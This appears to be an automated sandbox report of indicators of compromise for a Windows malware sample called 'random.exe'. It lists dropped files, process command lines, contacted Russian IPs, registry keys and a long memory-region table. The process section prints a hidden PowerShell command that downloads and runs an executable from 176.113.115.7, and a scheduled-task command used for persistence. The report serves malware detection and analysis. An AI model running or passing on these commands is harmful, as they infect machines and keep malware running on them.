IOC Report
random.exe

loading gifFilesProcessesURLsIPsRegistryMemdumps10864201,00010010Label

Files

File Path
Type
Category
Malicious
Download
random.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\TempB86OESU4AFVDFKW2E4COIQRCYGBWEQMI.EXE
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\3bp2mYNSQ.hta
HTML document, ASCII text, with very long lines (538), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x830627db, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_darpy1yc.fh4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkt4332p.5bg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwgbp3n5.1em.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnm4nc4p.lgy.psm1
ASCII text, with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\Tasks\rapes.job
data
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\random.exe
"C:\Users\user\Desktop\random.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn nunflmahplF /tr "mshta C:\Users\user\AppData\Local\Temp\3bp2mYNSQ.hta" /sc minute /mo 25 /ru "user" /f
malicious
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\user\AppData\Local\Temp\3bp2mYNSQ.hta
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn nunflmahplF /tr "mshta C:\Users\user\AppData\Local\Temp\3bp2mYNSQ.hta" /sc minute /mo 25 /ru "user" /f
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'B86OESU4AFVDFKW2E4COIQRCYGBWEQMI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
malicious
C:\Windows\System32\mshta.exe
C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\3bp2mYNSQ.hta
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'B86OESU4AFVDFKW2E4COIQRCYGBWEQMI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
malicious
C:\Users\user\AppData\Local\TempB86OESU4AFVDFKW2E4COIQRCYGBWEQMI.EXE
"C:\Users\user\AppData\Local\TempB86OESU4AFVDFKW2E4COIQRCYGBWEQMI.EXE"
malicious
C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
malicious
C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://176.113.115.7/mine/random
unknown
malicious
http://176.113.115.7
unknown
https://go.micro0
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
http://176.113.115.7/mine/random.exe
176.113.115.7
https://g.live.com/odclientsettings/ProdV2/C:
unknown
https://aka.ms/pscore68
unknown
https://aka.ms/pscore6lBQr
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 8 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
176.113.115.7
unknown
Russian Federation
malicious
176.113.115.6
unknown
Russian Federation
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
AB1000
unkown
page execute and read and write
malicious
A11000
unkown
page execute and read and write
malicious
4D10000
direct allocation
page read and write
malicious
4940000
direct allocation
page read and write
malicious
5280000
direct allocation
page read and write
malicious
AB1000
unkown
page execute and read and write
malicious
2C70F95C000
trusted library allocation
page read and write
8D0C000
stack
page read and write
3B327FE000
unkown
page readonly
7650000
heap
page read and write
B1F000
unkown
page execute and read and write
3DBF000
stack
page read and write
4E80000
direct allocation
page execute and read and write
4A7E000
stack
page read and write
414E000
stack
page read and write
52E5000
direct allocation
page read and write
6C4000
heap
page read and write
4B2E000
stack
page read and write
B1D000
unkown
page write copy
20F4127C000
heap
page read and write
3238000
heap
page read and write
353E000
stack
page read and write
31D8000
heap
page read and write
79EF000
stack
page read and write
2C70C439000
heap
page read and write
1620000
direct allocation
page read and write
4A7F000
stack
page read and write
1134000
heap
page read and write
6C4000
heap
page read and write
B16000
unkown
page execute and read and write
1107000
heap
page read and write
44A0000
direct allocation
page read and write
1184000
heap
page read and write
104C000
heap
page read and write
20F41270000
heap
page read and write
1C93AF1A000
heap
page read and write
7AF0000
trusted library allocation
page read and write
2C70EF5C000
trusted library allocation
page read and write
21743BE2000
heap
page read and write
DAE000
unkown
page execute and read and write
B1D000
unkown
page write copy
1044000
heap
page read and write
B1D000
unkown
page write copy
2C70C3A0000
heap
page read and write
1C93FBC0000
trusted library allocation
page read and write
984000
heap
page read and write
3C7F000
stack
page read and write
3B3297E000
stack
page read and write
6019000
trusted library allocation
page read and write
2C7263DB000
heap
page read and write
443E000
stack
page read and write
4AF0000
direct allocation
page execute and read and write
31E1000
heap
page read and write
1504000
heap
page read and write
7FF9364E0000
trusted library allocation
page read and write
2C7264D0000
heap
page read and write
1504000
heap
page read and write
40DF000
stack
page read and write
334F000
stack
page read and write
4B70000
direct allocation
page execute and read and write
7B10000
trusted library allocation
page read and write
E3DB37D000
stack
page read and write
1C93FC54000
heap
page read and write
A0E000
stack
page read and write
20F412C5000
heap
page read and write
292000
unkown
page readonly
7FF936411000
trusted library allocation
page read and write
570000
heap
page read and write
367E000
stack
page read and write
2C70E317000
heap
page execute and read and write
5410000
direct allocation
page execute and read and write
217431A3000
trusted library allocation
page read and write
29C000
unkown
page read and write
20F412E1000
heap
page read and write
7FEB000
stack
page read and write
64A3000
trusted library allocation
page read and write
3174000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
7FF936262000
trusted library allocation
page read and write
39FF000
stack
page read and write
628000
heap
page read and write
3B3147B000
stack
page read and write
6C4000
heap
page read and write
64AA000
trusted library allocation
page read and write
7879000
heap
page read and write
7460000
trusted library allocation
page read and write
63B0000
heap
page read and write
10C8000
heap
page read and write
6C4000
heap
page read and write
E3DAF8E000
stack
page read and write
7479000
trusted library allocation
page read and write
217431AE000
trusted library allocation
page read and write
1C93A613000
heap
page read and write
31F6000
heap
page read and write
7FF936316000
trusted library allocation
page read and write
20F414D0000
heap
page read and write
1C93FA70000
trusted library allocation
page read and write
AB1000
unkown
page execute and write copy
317E000
stack
page read and write
7AA0000
trusted library allocation
page read and write
66F000
heap
page read and write
1C93A590000
heap
page read and write
980000
heap
page read and write
474F000
stack
page read and write
20F42C0D000
heap
page read and write
EB1000
unkown
page execute and read and write
5430000
direct allocation
page execute and read and write
31F1000
heap
page read and write
C30000
heap
page read and write
601000
heap
page read and write
E3DB679000
stack
page read and write
42FE000
stack
page read and write
8231000
heap
page read and write
643000
heap
page read and write
44B1000
heap
page read and write
20F41218000
heap
page read and write
2C70C43D000
heap
page read and write
10B8000
heap
page read and write
7FF93631C000
trusted library allocation
page execute and read and write
217431A5000
trusted library allocation
page read and write
1430000
heap
page read and write
E3DAE83000
stack
page read and write
FE4000
heap
page read and write
3BDF000
stack
page read and write
1504000
heap
page read and write
2C726680000
heap
page read and write
20F412A8000
heap
page read and write
319D000
heap
page read and write
7FF9365C0000
trusted library allocation
page read and write
7FF9364B0000
trusted library allocation
page read and write
44A0000
direct allocation
page read and write
31A2000
trusted library allocation
page read and write
85AD000
stack
page read and write
FF3000
heap
page read and write
1C93B480000
trusted library section
page readonly
2BD0000
direct allocation
page read and write
31E7000
heap
page read and write
8FD000
stack
page read and write
21743BE2000
heap
page read and write
497E000
stack
page read and write
4EE0000
direct allocation
page execute and read and write
399E000
stack
page read and write
30DE000
stack
page read and write
1141000
heap
page read and write
A7F000
unkown
page execute and read and write
2B80000
heap
page read and write
2C70C320000
heap
page read and write
4E80000
direct allocation
page execute and read and write
46BE000
stack
page read and write
20F412E1000
heap
page read and write
45B0000
trusted library allocation
page read and write
3B3277E000
stack
page read and write
44A0000
direct allocation
page read and write
31D8000
heap
page read and write
1350000
heap
page read and write
D1E000
unkown
page execute and write copy
3173000
trusted library allocation
page execute and read and write
538B000
trusted library allocation
page read and write
785A000
heap
page read and write
68A1000
heap
page read and write
7585000
trusted library allocation
page read and write
3B317F7000
stack
page read and write
4CFE000
stack
page read and write
3D4F000
stack
page read and write
1C93B9E0000
trusted library allocation
page read and write
31F1000
heap
page read and write
20F41289000
heap
page read and write
3360000
heap
page read and write
812B000
stack
page read and write
20F412F2000
heap
page read and write
53A000
stack
page read and write
782A000
heap
page read and write
335E000
stack
page read and write
2C710075000
trusted library allocation
page read and write
3B32A7E000
stack
page read and write
1500000
heap
page read and write
7FF936310000
trusted library allocation
page read and write
DBD000
unkown
page execute and write copy
10A6000
heap
page read and write
1041000
heap
page read and write
E3DB87B000
stack
page read and write
1C941000000
heap
page read and write
21742F50000
heap
page read and write
31F6000
heap
page read and write
3230000
heap
page read and write
21743BF2000
heap
page read and write
6C4000
heap
page read and write
ECB304E000
stack
page read and write
5AEE000
stack
page read and write
2C70C478000
heap
page read and write
DD0000
heap
page read and write
4EA0000
direct allocation
page execute and read and write
31F3000
heap
page read and write
984000
heap
page read and write
5440000
direct allocation
page execute and read and write
2D4E000
stack
page read and write
2C70E55C000
trusted library allocation
page read and write
68B0000
heap
page read and write
2C70C4E5000
heap
page read and write
3F9F000
stack
page read and write
7FF936380000
trusted library allocation
page execute and read and write
E3DC34E000
stack
page read and write
2C7266CC000
heap
page read and write
8250000
heap
page read and write
4E80000
direct allocation
page execute and read and write
4C50000
heap
page execute and read and write
1C93FBC0000
trusted library allocation
page read and write
111B000
heap
page read and write
71CE000
stack
page read and write
7FF936280000
trusted library allocation
page read and write
5920000
heap
page read and write
4E50000
direct allocation
page execute and read and write
20F412C1000
heap
page read and write
31EA000
heap
page read and write
8510000
heap
page read and write
7A70000
trusted library allocation
page read and write
21742F69000
heap
page read and write
114A000
heap
page read and write
309F000
stack
page read and write
1C93A670000
heap
page read and write
72EA000
heap
page read and write
3250000
heap
page read and write
10F6000
heap
page read and write
44A0000
direct allocation
page read and write
31D2000
heap
page read and write
7FF936346000
trusted library allocation
page execute and read and write
106E000
stack
page read and write
2BD0000
direct allocation
page read and write
3FCE000
stack
page read and write
20F412BC000
heap
page read and write
7FF936590000
trusted library allocation
page read and write
217431AB000
trusted library allocation
page read and write
7FF936470000
trusted library allocation
page read and write
4B10000
direct allocation
page execute and read and write
2C70C4E2000
heap
page read and write
20F41288000
heap
page read and write
20F41270000
heap
page read and write
1C93FBF0000
remote allocation
page read and write
4CA7000
heap
page read and write
1D0000
unkown
page readonly
10F4000
heap
page read and write
295F000
stack
page read and write
31EA000
heap
page read and write
20F412F2000
heap
page read and write
1C93FAD9000
trusted library allocation
page read and write
407E000
stack
page read and write
64B7000
trusted library allocation
page read and write
1130000
heap
page read and write
2B9F000
stack
page read and write
2BD0000
direct allocation
page read and write
107E000
heap
page read and write
4E90000
direct allocation
page execute and read and write
53F0000
direct allocation
page execute and read and write
57CF000
stack
page read and write
F51000
unkown
page execute and read and write
2BDE000
stack
page read and write
4AB0000
direct allocation
page execute and read and write
20F412C4000
heap
page read and write
728E000
stack
page read and write
64A5000
trusted library allocation
page read and write
6C4000
heap
page read and write
1C93A713000
heap
page read and write
385E000
stack
page read and write
DBD000
unkown
page execute and read and write
2BCE000
stack
page read and write
5450000
direct allocation
page execute and read and write
651000
heap
page read and write
464E000
stack
page read and write
2C70E123000
trusted library allocation
page read and write
AB0000
unkown
page readonly
16AE000
heap
page read and write
4EF0000
direct allocation
page execute and read and write
FF3000
heap
page read and write
20F412C4000
heap
page read and write
3B0E000
stack
page read and write
8CCE000
stack
page read and write
21742F71000
heap
page read and write
2C07000
heap
page read and write
1C93A6BA000
heap
page read and write
2BD0000
direct allocation
page read and write
1C93B470000
trusted library section
page readonly
31C1000
heap
page read and write
E3DB27E000
stack
page read and write
7FF936570000
trusted library allocation
page read and write
5490000
direct allocation
page execute and read and write
3ECE000
stack
page read and write
ECB2E4F000
stack
page read and write
3354000
heap
page read and write
319A000
heap
page read and write
3288000
heap
page read and write
117D000
heap
page read and write
4BD0000
trusted library allocation
page read and write
625000
heap
page read and write
1058000
heap
page read and write
53F0000
direct allocation
page execute and read and write
2BD0000
direct allocation
page read and write
4891000
heap
page read and write
6C4000
heap
page read and write
1C93FC65000
heap
page read and write
3F3E000
stack
page read and write
669000
heap
page read and write
6C4000
heap
page read and write
BEF000
stack
page read and write
467F000
stack
page read and write
984000
heap
page read and write
9AA000
heap
page read and write
5FF1000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
1BBE000
stack
page read and write
8520000
trusted library allocation
page execute and read and write
7FF936415000
trusted library allocation
page read and write
10B8000
heap
page read and write
21743BD4000
heap
page read and write
72CF000
stack
page read and write
20F412E1000
heap
page read and write
1504000
heap
page read and write
3ACF000
stack
page read and write
31F3000
heap
page read and write
BCF000
stack
page read and write
5DD5000
heap
page read and write
7F0A0000
trusted library allocation
page execute and read and write
31D2000
heap
page read and write
B16000
unkown
page execute and read and write
31F1000
heap
page read and write
35DE000
stack
page read and write
1620000
direct allocation
page read and write
38BF000
stack
page read and write
E3DB97B000
stack
page read and write
930000
heap
page read and write
E3DB7FE000
stack
page read and write
395F000
stack
page read and write
37BE000
stack
page read and write
31C0000
heap
page read and write
48FF000
stack
page read and write
4E80000
direct allocation
page execute and read and write
643000
heap
page read and write
60D000
heap
page read and write
4ED0000
direct allocation
page execute and read and write
160F000
stack
page read and write
31C0000
trusted library allocation
page read and write
8600000
trusted library allocation
page execute and read and write
34FF000
stack
page read and write
3B329FE000
unkown
page readonly
4B00000
direct allocation
page execute and read and write
10B1000
heap
page read and write
1130000
heap
page read and write
D90000
heap
page read and write
7DE000
stack
page read and write
2D1E000
stack
page read and write
377F000
stack
page read and write
44A0000
direct allocation
page read and write
6C4000
heap
page read and write
2C71E340000
trusted library allocation
page read and write
20F412D2000
heap
page read and write
1630000
heap
page read and write
650000
heap
page read and write
2C70C403000
heap
page read and write
32BC000
heap
page read and write
30BE000
stack
page read and write
7FF936540000
trusted library allocation
page read and write
718E000
stack
page read and write
3160000
heap
page read and write
3C0F000
stack
page read and write
5F1E000
stack
page read and write
787B000
heap
page read and write
7845000
heap
page read and write
615F000
stack
page read and write
4D30000
heap
page read and write
2EF9000
stack
page read and write
31F1000
heap
page read and write
20F412A8000
heap
page read and write
189F000
stack
page read and write
FC0000
heap
page read and write
31A6000
heap
page read and write
1C93FA60000
trusted library allocation
page read and write
2FCE000
stack
page read and write
4B30000
trusted library allocation
page read and write
650000
heap
page read and write
3B3F000
stack
page read and write
3B325FE000
unkown
page readonly
5A0000
heap
page read and write
2C70DDA0000
heap
page read and write
75CE000
stack
page read and write
1C93FA90000
trusted library allocation
page read and write
DBE000
unkown
page execute and write copy
1504000
heap
page read and write
4E80000
direct allocation
page execute and read and write
425E000
stack
page read and write
7FF936270000
trusted library allocation
page read and write
4E4F000
stack
page read and write
1101000
heap
page read and write
2C70C3F0000
heap
page read and write
3192000
heap
page read and write
3C4E000
stack
page read and write
31B9000
heap
page read and write
105D000
heap
page read and write
60E000
heap
page read and write
4E80000
direct allocation
page execute and read and write
43B000
stack
page read and write
1045000
heap
page read and write
2C70C42F000
heap
page read and write
20F41291000
heap
page read and write
103E000
heap
page read and write
65D000
heap
page read and write
4FF1000
trusted library allocation
page read and write
31E6000
heap
page read and write
1129000
heap
page read and write
1C93AF1A000
heap
page read and write
20F412A8000
heap
page read and write
2C70C3B0000
heap
page read and write
1C93B450000
trusted library section
page readonly
10CA000
heap
page read and write
108D000
heap
page read and write
1C93FC61000
heap
page read and write
68AE000
heap
page read and write
4E93000
heap
page read and write
20F412D2000
heap
page read and write
5F7000
heap
page read and write
31AE000
heap
page read and write
7450000
trusted library allocation
page read and write
1C93FAA0000
trusted library allocation
page read and write
2A5F000
stack
page read and write
7FF936500000
trusted library allocation
page read and write
2C70E3B2000
trusted library allocation
page read and write
31EE000
heap
page read and write
21742F67000
heap
page read and write
6C4000
heap
page read and write
31B9000
heap
page read and write
44A0000
direct allocation
page read and write
31EA000
heap
page read and write
4D75000
direct allocation
page read and write
20F4150D000
heap
page read and write
1620000
direct allocation
page read and write
7A2E000
stack
page read and write
7FF936450000
trusted library allocation
page execute and read and write
31DF000
stack
page read and write
217431A9000
trusted library allocation
page read and write
669000
heap
page read and write
4F30000
direct allocation
page execute and read and write
20F412F2000
heap
page read and write
53E0000
direct allocation
page execute and read and write
106C000
heap
page read and write
4891000
heap
page read and write
34CE000
stack
page read and write
1096000
heap
page read and write
105E000
heap
page read and write
53F0000
direct allocation
page execute and read and write
10D9000
heap
page read and write
2C710077000
trusted library allocation
page read and write
1C93FAA0000
trusted library allocation
page read and write
1052000
heap
page read and write
1052000
heap
page read and write
643000
heap
page read and write
984000
heap
page read and write
AB0000
unkown
page read and write
984000
heap
page read and write
D02000
unkown
page execute and read and write
1011000
heap
page read and write
21742F54000
heap
page read and write
42BF000
stack
page read and write
435F000
stack
page read and write
33BF000
stack
page read and write
52BE000
stack
page read and write
744E000
stack
page read and write
4EAF000
heap
page read and write
68A0000
heap
page read and write
5385000
trusted library allocation
page read and write
217432C0000
heap
page read and write
10C8000
heap
page read and write
20F41210000
heap
page read and write
21743BD1000
heap
page read and write
6C4000
heap
page read and write
4E84000
heap
page read and write
4BCE000
stack
page read and write
1610000
heap
page read and write
4D34000
heap
page read and write
65C000
heap
page read and write
312F000
stack
page read and write
ECB2AFE000
stack
page read and write
3366000
heap
page read and write
6C4000
heap
page read and write
56CE000
stack
page read and write
21743BF1000
heap
page read and write
8A5A000
heap
page read and write
10A6000
heap
page read and write
BDB000
stack
page read and write
620000
heap
page read and write
A7D000
unkown
page write copy
7FF936510000
trusted library allocation
page read and write
7FF936320000
trusted library allocation
page execute and read and write
63A1000
heap
page read and write
2C70DDA5000
heap
page read and write
E3DB6FB000
stack
page read and write
664000
heap
page read and write
493E000
stack
page read and write
1C93F9F0000
trusted library allocation
page read and write
30EE000
stack
page read and write
3B328FE000
unkown
page readonly
116E000
heap
page read and write
B1D000
unkown
page write copy
5601000
trusted library allocation
page read and write
20F41291000
heap
page read and write
5DD0000
heap
page read and write
400E000
stack
page read and write
651000
heap
page read and write
1C93AE15000
heap
page read and write
457E000
stack
page read and write
1D1000
unkown
page execute read
320F000
stack
page read and write
7FF936580000
trusted library allocation
page read and write
5460000
direct allocation
page execute and read and write
1C93B440000
trusted library section
page readonly
6C4000
heap
page read and write
5FF9000
trusted library allocation
page read and write
70AD000
stack
page read and write
1C93A689000
heap
page read and write
7823000
heap
page read and write
44A0000
direct allocation
page read and write
6058000
trusted library allocation
page read and write
8530000
trusted library allocation
page read and write
3180000
trusted library allocation
page read and write
9A0000
heap
page read and write
1C93FCBC000
heap
page read and write
44A0000
direct allocation
page read and write
30E0000
heap
page read and write
10D6000
heap
page read and write
7B00000
trusted library allocation
page read and write
44B2000
heap
page read and write
7FF936490000
trusted library allocation
page read and write
20F41289000
heap
page read and write
26C000
unkown
page readonly
20F412A8000
heap
page read and write
7480000
trusted library allocation
page read and write
1C93FC2C000
heap
page read and write
8A50000
heap
page read and write
7FF936400000
trusted library allocation
page read and write
331F000
stack
page read and write
3B32EFE000
unkown
page readonly
44A0000
direct allocation
page read and write
2BD0000
heap
page read and write
651000
heap
page read and write
31D2000
heap
page read and write
2C726370000
heap
page read and write
4E00000
heap
page read and write
85EF000
stack
page read and write
63AF000
heap
page read and write
10E1000
heap
page read and write
321E000
stack
page read and write
1C93A5D0000
trusted library section
page read and write
2BD0000
direct allocation
page read and write
2C70C3A5000
heap
page read and write
3FDE000
stack
page read and write
35CF000
stack
page read and write
2FD0000
trusted library allocation
page read and write
317E000
heap
page read and write
984000
heap
page read and write
4AC0000
direct allocation
page execute and read and write
4B30000
direct allocation
page execute and read and write
8DF000
stack
page read and write
D4D000
stack
page read and write
5AA000
heap
page read and write
6C4000
heap
page read and write
1504000
heap
page read and write
7FF9362BC000
trusted library allocation
page execute and read and write
20F4128C000
heap
page read and write
115B000
heap
page read and write
4891000
heap
page read and write
FF2000
heap
page read and write
381E000
stack
page read and write
3C1E000
stack
page read and write
2A4000
unkown
page readonly
4E80000
direct allocation
page execute and read and write
1504000
heap
page read and write
7FF9365D0000
trusted library allocation
page read and write
3B31FFB000
stack
page read and write
9C0000
heap
page read and write
7A6D000
stack
page read and write
ECB2F4D000
stack
page read and write
4CA0000
heap
page read and write
116E000
heap
page read and write
104A000
heap
page read and write
107D000
heap
page read and write
86C0000
heap
page read and write
FB0000
heap
page read and write
7140000
heap
page execute and read and write
5145000
trusted library allocation
page read and write
5052000
trusted library allocation
page read and write
20F4124D000
heap
page read and write
4940000
direct allocation
page read and write
4EA4000
heap
page read and write
1C93A4B0000
heap
page read and write
6C4000
heap
page read and write
1C93AF13000
heap
page read and write
1620000
direct allocation
page read and write
106C000
heap
page read and write
2C7263F3000
heap
page read and write
31D8000
heap
page read and write
64B1000
trusted library allocation
page read and write
7B20000
trusted library allocation
page read and write
822C000
stack
page read and write
384F000
stack
page read and write
E3DB47E000
stack
page read and write
10F4000
heap
page read and write
360E000
stack
page read and write
1050000
heap
page read and write
1C93FBD0000
trusted library allocation
page read and write
1620000
direct allocation
page read and write
21743BF1000
heap
page read and write
4AC0000
direct allocation
page execute and read and write
20F41291000
heap
page read and write
3D5E000
stack
page read and write
7AB0000
trusted library allocation
page read and write
21743BD0000
heap
page read and write
6C4000
heap
page read and write
1637000
heap
page read and write
5480000
direct allocation
page execute and read and write
6C0000
heap
page read and write
3B3287E000
stack
page read and write
9AE000
stack
page read and write
398F000
stack
page read and write
2A0000
unkown
page write copy
FFF000
heap
page read and write
2A9E000
stack
page read and write
303E000
stack
page read and write
20F4124D000
heap
page read and write
21743BF3000
heap
page read and write
21743FB0000
heap
page read and write
4B38000
trusted library allocation
page read and write
655F000
trusted library allocation
page read and write
53C0000
direct allocation
page execute and read and write
1C93FA70000
trusted library allocation
page read and write
868E000
stack
page read and write
1690000
direct allocation
page read and write
6C4000
heap
page read and write
31EE000
heap
page read and write
117A000
heap
page read and write
702E000
stack
page read and write
5DD6000
heap
page read and write
1504000
heap
page read and write
7FF936419000
trusted library allocation
page read and write
317D000
trusted library allocation
page execute and read and write
217431C0000
heap
page read and write
36DF000
stack
page read and write
1087000
heap
page read and write
5AE000
heap
page read and write
1620000
direct allocation
page read and write
2C70FCFC000
trusted library allocation
page read and write
32E5000
heap
page read and write
DBE000
unkown
page execute and write copy
107C000
heap
page read and write
1504000
heap
page read and write
7A90000
trusted library allocation
page read and write
2E8E000
stack
page read and write
44A0000
direct allocation
page read and write
6C4000
heap
page read and write
DAE000
unkown
page execute and read and write
7FF9365B0000
trusted library allocation
page read and write
2C70E172000
heap
page read and write
20F41506000
heap
page read and write
53F0000
direct allocation
page execute and read and write
1050000
heap
page read and write
1C93B460000
trusted library section
page readonly
370F000
stack
page read and write
4A90000
heap
page read and write
2C726330000
heap
page read and write
324E000
stack
page read and write
16A0000
heap
page read and write
10A6000
heap
page read and write
78B0000
trusted library allocation
page read and write
20F412BA000
heap
page read and write
888E000
stack
page read and write
1C93FAB4000
trusted library allocation
page read and write
335E000
stack
page read and write
2CDF000
stack
page read and write
2C7266DA000
heap
page read and write
1C93FCC4000
heap
page read and write
1C93B001000
trusted library allocation
page read and write
6554000
trusted library allocation
page read and write
DA2000
unkown
page execute and read and write
BFE000
stack
page read and write
21743BD2000
heap
page read and write
4E90000
heap
page read and write
3B318FE000
unkown
page readonly
1C93A6A3000
heap
page read and write
984000
heap
page read and write
1C93FCDB000
heap
page read and write
1620000
direct allocation
page read and write
643000
heap
page read and write
20F41288000
heap
page read and write
FBF000
stack
page read and write
79AE000
stack
page read and write
1127000
heap
page read and write
2EA9000
stack
page read and write
2C726418000
heap
page read and write
53F0000
direct allocation
page execute and read and write
4B7F000
stack
page read and write
4D4E000
stack
page read and write
7FF93627B000
trusted library allocation
page read and write
1D1000
unkown
page execute read
FF1000
heap
page read and write
1620000
direct allocation
page read and write
4940000
direct allocation
page read and write
217433D0000
trusted library allocation
page read and write
1130000
heap
page read and write
20F4128C000
heap
page read and write
1C93A69D000
heap
page read and write
6C4000
heap
page read and write
DBD000
unkown
page execute and write copy
3B31BF9000
stack
page read and write
20F4128C000
heap
page read and write
4AC0000
direct allocation
page execute and read and write
80EC000
stack
page read and write
44A0000
direct allocation
page read and write
44B1000
heap
page read and write
439E000
stack
page read and write
104B000
heap
page read and write
E3DAFCE000
stack
page read and write
4B50000
direct allocation
page execute and read and write
49A5000
direct allocation
page read and write
6870000
heap
page read and write
4E80000
direct allocation
page execute and read and write
103D000
heap
page read and write
20F41500000
heap
page read and write
4C9E000
stack
page read and write
2C70E160000
heap
page read and write
10EA000
heap
page read and write
D1D000
unkown
page execute and read and write
10D6000
heap
page read and write
984000
heap
page read and write
217432C4000
heap
page read and write
53F0000
direct allocation
page execute and read and write
DB0000
heap
page read and write
1C93FCFF000
heap
page read and write
8236000
heap
page read and write
BBF000
stack
page read and write
410F000
stack
page read and write
651000
heap
page read and write
1C93FD02000
heap
page read and write
47BF000
stack
page read and write
5E8000
heap
page read and write
31A5000
heap
page read and write
3B330FE000
unkown
page readonly
63B1000
heap
page read and write
91E000
stack
page read and write
21743BEC000
heap
page read and write
FE0000
heap
page read and write
53A0000
trusted library allocation
page read and write
53BF000
stack
page read and write
20F412E1000
heap
page read and write
2C71E4E3000
trusted library allocation
page read and write
3EFF000
stack
page read and write
2C70E120000
trusted library allocation
page read and write
1620000
direct allocation
page read and write
1D0000
unkown
page readonly
10E8000
heap
page read and write
4A3F000
stack
page read and write
20F411A0000
heap
page read and write
7842000
